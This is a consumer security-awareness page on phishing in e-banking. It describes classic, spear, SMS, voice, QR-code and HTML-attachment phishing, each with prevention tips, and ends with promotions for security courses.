Home Page Navigation Contents Contact Sitemap Search

Phishing

Attackers use phishing to obtain log-in data from unsus­pecting Internet users, for instance to then access e-banking facil­i­ties or online shops. In the process, the attackers affect a fake iden­tity, so exploiting their vic­tims’ good faith.

Pro­tect your­self against phishing by...

  • never using any links you receive by e-mail, SMS or mes­senger ser­vices, and never scan­ning in any such QR codes to log into your finan­cial insti­tu­tion facility.
  • never filling in any forms received by e-mail and asking you to enter log-in information.
  • treating any attach­ments received with e-mails and text mes­sages with great caution.
  • never dis­closing any con­fi­den­tial infor­ma­tion, such as pass­words, during tele­phone calls.
  • always entering the address for your online ser­vice provider or finan­cial institution’s log-in page man­u­ally via the browser address line.
  • checking there is an SSL con­nec­tion (https://, lock symbol) when calling up a log-in page, and ver­i­fying that the Internet address shown in the address bar of your browser actu­ally indi­cates that you have reached the cor­rect page.
  • con­tacting your finan­cial insti­tu­tion if you are not quite sure or some­thing is not com­pletely clear.

A typ­ical phishing attack

1. Con­tact

Crim­i­nals send out faked e-mails pur­porting to be employees of online ser­vice providers or finan­cial insti­tu­tions. The recip­i­ents of such e-mails are for instance informed that their account infor­ma­tion or access data (e. g. user name and pass­word) are no longer safe or up-to-date, and that they should be updated using the link stated in their e-mail.

2. Inter­cepting per­sonal data

A link stated in their e-mail does not how­ever lead to the orig­inal ser­vice provider page, but to a faked web­site, albeit a very authentic looking one. Per­sonal infor­ma­tion entered there, such as pass­words, directly end up in the hands of the perpetrators.

3. Gain

Using the stolen infor­ma­tion, the per­pe­tra­tors then, for instance, carry out remit­tances from their victim’s bank account, buy online at their cost or place faked offers with online auc­tion houses.

 

For you to receive phishing mails, fraud­sters have to know your e-mail address first. To reduce this risk and spam received into your inbox gen­er­ally, it helps to follow some simple rules, to be found in our article on spam.

Phishing means the theft of infor­ma­tion which is worthy of pro­tec­tion, for instance Internet user log-in information.

The term phishing is made up from the words “pass­word” and “fishing”.

 

Info sheet:

Fur­ther infor­ma­tion for anyone interested

Classic phishing

With classing phishing, the attackers are trying to lure their vic­tims to a coun­ter­feit web­site with the help of a faked e-mail and to get them to enter their log-in infor­ma­tion (for instance account number, pass­word) there.

Alter­na­tively or addi­tion­ally, they may also add mail attach­ments con­taining a Trojan. Once this attach­ment is opened, it installs itself in the back­ground, pro­ceeding to cap­ture Internet users’ access details or directing them to fake websites.

Impor­tant to know: Finan­cial insti­tu­tions would never send out e-mails like that!

Pre­ven­tion: Never click any links or attach­ments in e-mails, but always enter the finan­cial institution’s address into your browser man­u­ally, and check SSL con­nec­tion and cer­tifi­cate.

Spear phishing and dyna­mite phishing

In con­trast to classic phishing which involves large amounts of e-mails ran­domly sent to a broad public, with spear phishing, recip­i­ents are specif­i­cally chosen and receive e-mails per­son­ally tai­lored to them.

Senders take the guise of a trust­worthy person here, often posing as an acquain­tance, employee or busi­ness partner of the recip­ient. The per­son­alised e-mail con­tents seem cred­ible and authentic and are there­fore not even recog­nised by spam fil­ters at times.

If such per­son­alised e-mails are cre­ated auto­mat­i­cally and sent out en masse, we also call this “dyna­mite phishing”.

Pre­ven­tion: Remain wary of unex­pected e-mails or those with unusual con­tents, even if you think you know the sender. In case of doubt, con­tact the sender via a second channel, for instance by telephone.

Smishing (SMS-Phishing)

SMS mes­sages are increas­ingly used for phishing attacks, too. The per­fid­ious thing about “smishing” is that most of the cri­teria suit­able to recog­nise phishing e-mails cannot be used for SMS mes­sages: There is usu­ally no per­sonal form of address. Lan­guage and design of these text mes­sages are too simple and brief to allow any con­clu­sions as to whether they are fake.  And on most mobile devices, it is rather dif­fi­cult or unre­li­able to check the true sender and the link.  Many users are also used to receiving SMS mes­sages to verify their e-banking log-in or before finan­cial trans­ac­tions are car­ried out.

Pre­ven­tion: Never click on any links included in SMS mes­sages, but man­u­ally enter the web­site address of your finan­cial insti­tu­tion which you are familiar with into your browser. Then check there is a secure con­nec­tion (lock symbol, target address). If you receive any unex­pected SMS mes­sages, con­tact your bank via the con­tact infor­ma­tion you know (for instance their offi­cial tele­phone number) and have them con­firm that they actu­ally sent this SMS.

Vishing (voice phishing or phone phishing)

Vishing is the voice- or tele­phone-based ver­sion of phishing. Sim­ilar to classic phishing, a well thought-out story is employed to induce users to dis­close con­fi­den­tial infor­ma­tion, such as their log-in details for their e-banking facility.

Pre­ven­tion: Never let other people know any of your con­fi­den­tial data, such as pass­words. Imme­di­ately ter­mi­nate any phone calls asking you for such details. Con­tact your finan­cial insti­tu­tion only via their offi­cial tele­phone numbers.

QR Phishing

With QR phishing, attackers simply stick their own QR codes (Quick Response codes) over those dis­played in fre­quently vis­ited places and direct gullible users to a fake URL. This way, it is easily pos­sible to exe­cute scripts or show a faked finan­cial insti­tu­tion log-in page, in par­tic­ular on mobile devices.

Pre­ven­tion: Never use any QR codes to log into any finan­cial insti­tu­tion site. Before scan­ning any QR codes please check whether they have not been cov­ered up by a fake one. Check whether the link points to your desired address.

Phishing using web­sites in the attachment

When phishing using web­sites, no link or doc­u­ment is included in the e-mail you receive – instead, there is simply an HTM- or HTML file con­taining a fake web­site in the attach­ment. Vic­tims are fooled, since there is no link to click on. And at first glance, the attached file doesn’t seem to be that dan­gerous either, as it isn’t an actual doc­u­ment (Word, Excel) which could for instance run some macros.

But cau­tion! HTM and HTML files can redi­rect vic­tims straight to the attacker’s server! Any log-in infor­ma­tion then entered will end up in the wrong hands this way. In addi­tion, such files can also con­tain scripts, which may just cause more damage.

Such redi­rects and scripts are blocked by the latest e-mail soft­ware for secu­rity rea­sons. If how­ever you open such an HTM or HTML attach­ment, this is no longer con­trolled by the mail program’s secu­rity set­tings. This is extra-per­fid­ious, since even users aware of phishing in gen­eral are duped, since the browser address line “only” shows a local file path and not a dubious URL the way it is dis­played with classic phishing.

Pre­ven­tion: Please be wary of any HTM or HTML attach­ments in gen­eral. Don’t click on any e-mail attach­ments, but always enter your finan­cial institution’s address into your browser manually.

What else would you like to learn about security when e-banking?

Reg­ister for a course now
and learn more:

Basic course

Find out about cur­rent Internet threats and some easy pro­tec­tive mea­sures, and how to securely use e-banking.

fur­ther information

Online course mobile banking/payments

Find out about mobile banking, mobile pay­ments and how to securely use these apps.

fur­ther information

Online course for the under-30s

Learn how to use your smart­phone securely. Next to basics, we will show you what you should know about social media, clouds, mobile banking and mobile payments.

fur­ther information

Course for SMEs

Is your organ­i­sa­tion suf­fi­ciently secure? Learn which mea­sures you can take to sig­nif­i­cantly strengthen your organisation’s IT security.

fur­ther information